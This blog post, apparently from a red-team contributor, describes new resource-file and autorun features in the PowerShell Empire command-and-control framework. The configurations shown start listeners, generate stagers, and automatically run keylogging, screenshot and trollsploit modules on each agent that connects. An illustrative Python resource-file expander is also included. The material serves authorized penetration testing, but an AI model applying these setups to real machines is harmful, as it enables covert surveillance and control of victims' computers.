Carrie Roberts*
ADVISORY: The techniques and tools referenced within this blog post may be outdated and do not apply to current situations. However, there is still potential for this blog entry to be used as an opportunity to learn and to possibly update or integrate into modern tools and techniques.
I have added resource file and autorun functionality to PowerShell Empire. Empire now has the ability to run multiple commands at once by specifying the commands in a resource file. You can use this feature to automate the startup of your listeners and perform other tasks. In addition, you can specify multiple commands to run automatically on any new agents that connect using the new autorun feature.
Consider the following resource file containing the Empire commands used to start up our go-to listener, named http443, on port 443. In this example the file is called http443.rc and is located in /root.
```
listeners
uselistener http
set Name http443
set DefaultProfile /admin/login.php,/console/dashboard.asp,/news/today.jsp| Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0);
set Host 192.168.0.124
set Port 443
execute
```
To run all these commands at once within Empire, simply use the newly added “resource” command (resource /root/http443.rc), as shown in the image below.
Wow, that was easy, one command and everything is started with our custom settings!
Here is another example resource file to generate the OS X and Windows launch commands for our new listener.
```
listeners
usestager osx/launcher
set Listener http443
execute
back
usestager multi/launcher
set Listener http443
execute
```
The image above shows the output from running the launchers.rc resource file. The beginning of the Python launcher is shown at the bottom (echo “import sys . . .”). The PowerShell one-liner was also output but is not shown in the image for brevity.
Now let’s have a look at the “autorun” command that I added to the agent’s menu. With the autorun command, you can specify a resource file to execute automatically when a new agent connects to your listener. When you set the autorun, you specify which agent language the commands should be run on (e.g. Python or PowerShell). Consider that we have the following in the resource file /root/autorun-py.rc:
```
usemodule trollsploit/osx/say
set Text Supercalifragilisticexpialidocious
execute
```
This file is intended to execute on a Python agent (OS X) and to speak the text “Supercalifragilisticexpialidocious” using the computer text-to-speech functionality.
Next, we have a resource file specifying three modules to run on any PowerShell agents that connect (/root/autorun-ps.rc):
```
usemodule collection/keylogger
execute
back
usemodule collection/screenshot
execute
back
usemodule trollsploit/voicetroll
set VoiceText Booya
execute
```
The resource file above contains commands to start keylogging, take a screenshot, and say the text “Booya”. The following commands will set the autorun for any Python and PowerShell agents.
To see what commands have been set for each language, use the “autorun show” command, optionally specifying the language.
Okay, now we have told Empire to execute the autorun-py commands automatically whenever a new Python agent connects and to run the autorun-ps commands whenever a new PowerShell agent connects. To clear the autorun setting, use the “autorun clear” command. Specifying a language (the first command below) clears only the Python autorun commands, while omitting it (the second command) clears the autorun commands for all languages.
We have demonstrated a lot of cool things, but let’s roll all this functionality up into a single resource file that does it all (/root/doitall.rc):
```
# Start my port 80 http listener
resource /root/http80.rc
# Start my port 443 http listener
resource /root/http443.rc
# set my autorun scripts
resource /root/autoruns.rc
# return to the main menu
main
```
This resource file calls other resource files such as the http443.rc file demonstrated at the beginning of this post. It also starts up a similar listener on port 80 and sets our autoruns using the autoruns.rc file shown below.
```
agents
autorun /root/autorun-py.rc python
autorun /root/autorun-ps.rc powershell
```
Note that in the doitall.rc file, descriptive comments are included. Any line that starts with # is considered a comment and ignored by Empire.
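A small dry-run expander for this resource file format, added here as an illustration (it is not Empire's own resource handling): it drops blank lines and # comments, follows nested resource lines such as those in doitall.rc, and refuses to loop on a file that includes itself, so the full command sequence can be reviewed before any of it is run. The file contents and paths are constructed samples mirroring the post.

```python
"""Dry-run expander for Empire-style resource files (added example, not Empire's code)."""
from typing import Callable, Dict, List, Tuple

# Constructed sample files mirroring the layout described in the post.
SAMPLE_FILES: Dict[str, str] = {
    "/root/doitall.rc": (
        "# Start my port 443 http listener\n"
        "resource /root/http443.rc\n"
        "# set my autorun scripts\n"
        "resource /root/autoruns.rc\n"
        "# return to the main menu\n"
        "main\n"
    ),
    "/root/http443.rc": "listeners\nuselistener http\nset Name http443\nset Port 443\nexecute\n",
    "/root/autoruns.rc": "agents\nautorun /root/autorun-py.rc python\nautorun /root/autorun-ps.rc powershell\n",
    "/root/loop.rc": "# a file that includes itself\nresource /root/loop.rc\n",
}


def parse_lines(text: str) -> List[str]:
    """Return the commands in a resource file: blank lines and '#' comment lines are dropped."""
    commands = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        commands.append(line)
    return commands


def expand(path: str, read: Callable[[str], str], seen: Tuple[str, ...] = ()) -> List[str]:
    """Flatten nested 'resource <file>' lines into one reviewable command list.

    'autorun <file> <lang>' lines are kept verbatim: those files run later on agents,
    not at startup. An include cycle raises ValueError instead of recursing forever.
    """
    if path in seen:
        raise ValueError("resource include cycle: " + " -> ".join(seen + (path,)))
    flat: List[str] = []
    for cmd in parse_lines(read(path)):
        parts = cmd.split(None, 1)
        if parts[0] == "resource" and len(parts) == 2:
            flat.extend(expand(parts[1], read, seen + (path,)))
        else:
            flat.append(cmd)
    return flat


def expand_sample(path: str = "/root/doitall.rc") -> List[str]:
    """Expand one of the constructed sample files using the in-memory loader."""
    return expand(path, lambda p: SAMPLE_FILES[p])


if __name__ == "__main__":
    for command in expand_sample():
        print(command)
```

Pass a real file reader (for example `lambda p: open(p).read()`) instead of the in-memory loader to expand files on disk.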
We can run our doitall.rc file from within Empire using the resource command, or we can specify it on the command line when starting Empire with the “--resource” parameter.
Awesome, we started up listeners with custom settings and set our autoruns all with a single command! Very nice! Here is a video walkthrough of everything discussed in this post.
To use this new feature, grab the Empire code from https://github.com/EmpireProject/Empire. Until these features are merged into a release or the master branch, you’ll have to check out the dev branch to use them. I hope you enjoy this new functionality as much as I do; it definitely removes a large pain point when using Empire and makes way for a high degree of automation.

________

*Though Carrie no longer works for BHIS, she remains our good friend and loyal guest post contributor! You can follow her on Twitter.